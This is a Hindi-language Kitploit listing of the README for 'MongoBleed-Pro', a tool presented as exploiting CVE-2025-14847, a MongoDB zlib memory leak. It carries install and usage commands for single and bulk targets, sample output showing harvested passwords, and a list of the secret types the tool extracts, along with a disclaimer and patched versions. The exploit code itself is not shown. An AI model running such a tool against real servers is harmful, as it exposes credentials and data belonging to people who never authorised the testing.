Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-14847_Expolit — MongoDB के zlib कंप्रेशन हैंडलिंग में एक महत्वपूर्ण मेमोरी डिस्क्लोज़र भेद्यता। यह टूल सुरक्षा शोधकर्ताओं को कमजोर MongoDB इंस्टेंस से संवेदनशील डेटा निकालने की अनुमति देता है। | Kitploit
उपकरण/GitHubGitHub/cybertechajju/cve-2025-14847_expolit
मेमोरी फोरेंसिकभेद्यता विश्लेषणशोषणडेटा निष्कासनजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगसीक्रेट डिटेक्शनलर्निंग और शिक्षाडेटाबेस सुरक्षा

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHubcybertechajju/cve-2025-14847_expolit

CVE-2025-14847_Expolit

MongoDB के zlib कंप्रेशन हैंडलिंग में एक महत्वपूर्ण मेमोरी डिस्क्लोज़र भेद्यता। यह टूल सुरक्षा शोधकर्ताओं को कमजोर MongoDB इंस्टेंस से संवेदनशील डेटा निकालने की अनुमति देता है।

रिपॉजिटरी देखें
33338 महीने पहलेKitploit द्वारा समीक्षित

MongoBleed-Pro ☠️

CVE Python License Status

उन्नत MongoDB मेमोरी लीक शोषण उपकरण
सीखते रहें | हैक करते रहें CyberTechAjju के साथ


🔥 परिचय

MongoBleed-Pro CVE-2025-14847 के लिए एक उन्नत शोषण उपकरण है, जो MongoDB के zlib संपीड़न प्रबंधन में एक गंभीर मेमोरी प्रकटीकरण भेद्यता है। यह उपकरण सुरक्षा शोधकर्ताओं को कमजोर MongoDB इंस्टेंस से संवेदनशील डेटा निकालने की अनुमति देता है।

⚠️ अस्वीकरण

यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच गैरकानूनी है। परीक्षण से पहले हमेशा उचित प्राधिकरण प्राप्त करें।


💀 भेद्यता विवरण

गुणविवरण
CVE IDCVE-2025-14847
भेद्यता प्रकारमेमोरी प्रकटीकरण
प्रभावित संस्करणMongoDB < 8.0.10, < 7.3.6, < 7.0.19, < 6.0.23
मूल कारणzlib डीकंप्रेसन में बफर ओवर-रीड
प्रभावअप्रमाणित दूरस्थ मेमोरी लीक

🚀 विशेषताएँ

  • ☠️ हैकर-शैली UI - एनिमेशन के साथ उत्कृष्ट टर्मिनल इंटरफ़ेस
  • ⚡ मल्टी-थ्रेडेड स्कैनिंग - कॉन्फ़िगरेबल थ्रेड्स के साथ तेज़ मेमोरी निष्कर्षण
  • 🎯 स्वचालित भेद्यता पहचान - शोषण से पहले स्वचालित भेद्यता जांच
  • 🔑 गुप्त पैटर्न पहचान - AWS कुंजियाँ, API टोकन, पासवर्ड, ईमेल ढूँढता है
  • 📊 रीयल-टाइम प्रगति - लाइव मेमोरी लीक विज़ुअलाइज़ेशन
  • 💾 डेटा निर्यात - विश्लेषण के लिए निकाले गए डेटा को फ़ाइलों में सहेजता है
  • 🌐 बल्क स्कैनिंग - फ़ाइल से कई लक्ष्यों को स्कैन करें

📦 स्थापना

root@kitploit:~
# Clone the repository
git clone https://github.com/cybertechajju/CVE-2025-14847_Expolit.git
cd CVE-2025-14847_Expolit

# Install dependencies
pip install -r requirements.txt

🎮 उपयोग

बुनियादी उपयोग

root@kitploit:~
python3 mongobleed_pro.py

विशिष्ट होस्ट को लक्षित करें

root@kitploit:~
python3 mongobleed_pro.py --target 192.168.1.100

कस्टम पोर्ट

root@kitploit:~
python3 mongobleed_pro.py --target 192.168.1.100:27018

बल्क स्कैनिंग

root@kitploit:~
python3 mongobleed_pro.py --file targets.txt

उन्नत विकल्प

root@kitploit:~
python3 mongobleed_pro.py --target 192.168.1.100 --threads 100 --min-offset 100 --max-offset 20000

सभी विकल्प


📸 स्क्रीनशॉट

root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║  💀 INITIATING MEMORY EXTRACTION SEQUENCE 💀                 ║
╚══════════════════════════════════════════════════════════════╝

⚡ Target Acquired: 192.168.1.100:27017
   ✓ Port OPEN
   ☠️  VULNERABLE! Initiating attack...

  ◉ 0x0E31 │ nr_inactive_anon 134420\nnr_active_anon 110832...
  ☠️  LOOT ACQUIRED: 🔐 Password
      → admin_pass=SuperSecret123

╔══════════════════ EXTRACTION COMPLETE ══════════════════╗
║  💾 Bytes Extracted: 125,847
║  📦 Unique Fragments: 342
║  🔑 Secrets Found: 5
╚══════════════════════════════════════════════════════════╝

🔑 पता लगाए गए गुप्त प्रकार

  • 🔑 AWS एक्सेस कुंजियाँ (AKIA...)
  • 🤖 OpenAI API कुंजियाँ (sk-...)
  • 🐙 GitHub टोकन (ghp_...)
  • 🔐 पासवर्ड और रहस्य
  • 📧 ईमेल पते

📁 आउटपुट फ़ाइलें

फ़ाइलविवरण
loot_<host>.txtपढ़ने योग्य प्रारूप में निकाले गए रहस्य
dump_<host>.binमैन्युअल विश्लेषण के लिए कच्चा मेमोरी डंप

🛡️ शमन

यदि आप MongoDB प्रशासक हैं, तो पैच किए गए संस्करणों में अपडेट करें:

  • MongoDB 8.0.10+
  • MongoDB 7.3.6+
  • MongoDB 7.0.19+
  • MongoDB 6.0.23+

👤 लेखक

CyberTechAjju

  • 🐦 ट्विटर: @CyberTechAjju

📜 लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।


⭐ समर्थन

यदि आपको यह उपकरण उपयोगी लगा, तो कृपया इसे GitHub पर ⭐ दें!


「 सीखते रहें | हैक करते रहें 」
❤️ के साथ CyberTechAjju द्वारा बनाया गया

टूल डाउनलोड करें
आर्गुमेंटविवरणडिफ़ॉल्ट
--targetलक्ष्य IP/URLइंटरैक्टिव प्रॉम्प्ट
--fileलक्ष्य सूची वाली फ़ाइलकोई नहीं
--threadsथ्रेड्स की संख्या50
--min-offsetन्यूनतम मेमोरी ऑफ़सेट20
--max-offsetअधिकतम मेमोरी ऑफ़सेट8192